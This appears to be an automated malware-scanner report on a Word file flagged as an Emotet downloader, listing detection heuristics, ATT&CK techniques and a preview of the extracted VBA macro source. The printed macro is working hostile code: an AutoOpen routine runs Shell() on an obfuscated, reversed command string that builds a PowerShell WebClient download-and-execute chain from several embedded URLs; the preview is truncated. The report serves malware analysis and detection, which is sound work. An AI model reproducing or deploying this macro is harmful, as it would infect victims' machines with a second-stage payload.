MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The sample contains a VBA macro with an AutoOpen subroutine that calls the Shell() function. This is a common technique used by Emotet to download and execute a second-stage payload. The ClamAV detection name also explicitly identifies it as an Emotet downloader.
Heuristics 6
-
ClamAV: Doc.Downloader.Emotet-6883983-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6883983-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5270 bytes |
SHA-256: f9ac4e9586ad679239c43c0d5b11ff56128a0f1cb656c8800ddfc6ea4ac80c2f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "FFZfwUfC"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
Set SmDUA = pZtAs
Set DDIUar = fzITY
Set KIbsbi = QzIAiK
Set JFJdMV = jNjYPf
Set ikwjA = Qqldor
Set IDPPz = qNfpuE
Set PcTiAj = bDonu
Shell MDlrjZDsFf + hWmdGiqhda + BIfUnzT + fjnCwifzqTt + zabEcVivtNEt, Format(0)
Set qquJT = zXHAr
Set wkGNGU = qKBjOr
End Sub
Attribute VB_Name = "mTjJiIoIvJam"
Function MDlrjZDsFf()
On _
Error _
Resume _
Next
Set rHHHF = jiCIc
Set tcKzCq = zFvDk
kIicVDzA = Format(Chr(13 + 10 + 5 + 4 + 67)) + "md /V" + "^" + ":^ON" + "/" + Format(Chr(8 + 7 + 3 + 3 + 46)) + Format(Chr(4 + 3 + 1 + 1 + 25)) + "^" + "s" + "^et I^" + "5" + "=^ "
Set dcaak = XwJLv
Set EWsYT = nusvm
Set AuWNkw = Edzkr
Set QPOjR = CQhUcQ
Set hwuYSj = PUrWhA
kfStBqcR = "^ ^ ^" + " ^ " + "^ " + "^ " + "^ " + " ^" + " ^ ^ " + " ^}" + "^}{" + "^"
Set qjjTdw = iPzNO
Set CBdjsU = rQvzwN
Set KwjlNs = fLpaH
pGdWMXSIi = "h" + Format(Chr(13 + 10 + 5 + 4 + 67)) + "t^" + "a" + Format(Chr(13 + 10 + 5 + 4 + 67)) + "^}^" + ";^ka" + "^" + "erb^;" + "^Qj^B$^" + " ^" + "m^etI-" + "^ekovn"
Set jYwpSM = qXPRs
Set mwDri = nKSVBi
Set qRMmM = MQikQn
ikkBvunMZ = "^I" + "^;" + ")^QjB$" + " ^,v^q" + "D^$(^e" + "^" + "l^i" + "^Fd^ao^" + "ln^wo^" + "D.^fQ" + "T^" + "$^{yr^t"
Set zbSlQ = hAcrf
tlzEpdBLiET = "^{" + ")O" + "r^H^" + "$" + " " + "ni"
Set wmGBW = oWiwt
Set SauKG = tXMLJu
Set zUTWnC = IzBLIw
rchVAjjznIQ = "^ vqD" + "^$(^" + "h" + Format(Chr(13 + 10 + 5 + 4 + 67)) + "^a" + "^er^o^f" + ";'exe" + ".^'+" + "jIa^$" + "+'\^'"
MDlrjZDsFf = kIicVDzA + kfStBqcR + pGdWMXSIi + ikkBvunMZ + tlzEpdBLiET + rchVAjjznIQ
Set Iwlath = uqZpj
Set GcWYn = HXISU
Set dtwwj = BOYDs
End Function
Function hWmdGiqhda()
On _
Error _
Resume _
Next
Set adohk = LdjzNz
Set iZdvz = JliYmj
pswZR = "^+" + Format(Chr(13 + 10 + 5 + 4 + 67)) + "^i" + "^" + "lb^u^p" + "^:vn" + "^e^$" + "^=" + "^Q"
Set IPVAm = uPKtvw
Set cjhht = ALnNZ
DLiEGjPuzqn = "^j^B$^;" + "^'50^2^" + "' " + "=^ j^I" + "a^$^;)'" + "^@^" + "'"
Set jvhVqs = MbQFoX
Set cHahwz = QpRXMb
Set HvodG = XEOnKC
Set PuDiZI = iswmMn
Set CBwoj = sEwWd
YEwljRVQD = "(^tilp" + "^S" + "^" + ".^'" + Format(Chr(13 + 10 + 5 + 4 + 67)) + "S" + "^"
Set fpXcBo = cRTCSo
Set cIMFVC = HiErvw
Set LcajKb = wnBLq
unANrDmkSbw = "qD" + "f^X" + "w7/^" + "k^p^.sp" + "^ir^t^0" + "^63/" + "/^:p^t" + "th@^"
Set GjsnM = ZLmCz
Set qYoVc = bdZzFJ
Set KLWZw = UTzcv
RidhaS = "iD^" + "kt" + "^A^" + "X^X/" + "nv"
Set zpwYAP = oLqYMZ
Set rXJYTB = bQvtI
Set VqqDEW = hWvKJS
Set tCCin = OJrvO
Set uXbLZ = XUzhLs
tbfhkbn = "^" + "." + "t^en" + ".im" + "^i"
Set RObXH = msTUDM
Set GbHfv = DEaZK
Imctj = "kit" + "//" + ":" + "^p^t^" + "t^" + "h@^"
Set pGMhfY = wwVok
LMzGwJ = "Zu^" + "HDp" + "^" + "pt^MA/" + "^mo" + Format(Chr(13 + 10 + 5 + 4 + 67)) + "^.^st" + "n^" + "iapr^a" + "g" + "^as/" + "/:pt" + "^th" + "^"
Set kTaPWo = CnLaOM
Set MALJD = HVjts
nWsjtjTGmL = "@" + "f^YVzv^" + "G0^t/^m" + "^o" + Format(Chr(13 + 10 + 5 + 4 + 67)) + "^.^" + "oi^d^" + "em^ero^" + "d^a^lu" + "b//:^"
hWmdGiqhda = pswZR + DLiEGjPuzqn + YEwljRVQD + unANrDmkSbw + RidhaS + tbfhkbn + Imctj + LMzGwJ + nWsjtjTGmL
Set rLBFUq = ksDoF
End Function
Function BIfUnzT()
On _
Error _
Resume _
Next
Set IUzJj = ckzzjc
Set EJuKw = oYuuW
Set tVdjGQ = AZJszv
hqEtzWniVLl = "p^tt^" + "h@fm" + "^w^eR^" + "g^X" + "^f" + Format(Chr(8 + 7 + 3 + 3 + 46)) + "/^" + "mo" + Format(Chr(13 + 10 + 5 + 4 + 67)) + "^" + ".gn^ah" + "^hn^" + "i" + "h" + Format(Chr(13 + 10 + 5 + 4 + 67)) + "m^" + "3"
Set LzNHr = ZIznc
Set ACMBjj = ZzNtA
STOCImzoN = "//" + ":p^t^" + "t^h'=" + "^Or" + "^" + "H" + "$;^tn" + "^eil" + Format(Chr(8 + 7 + 3 + 3 + 46)) + "b^" + "e^W." + "teN"
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.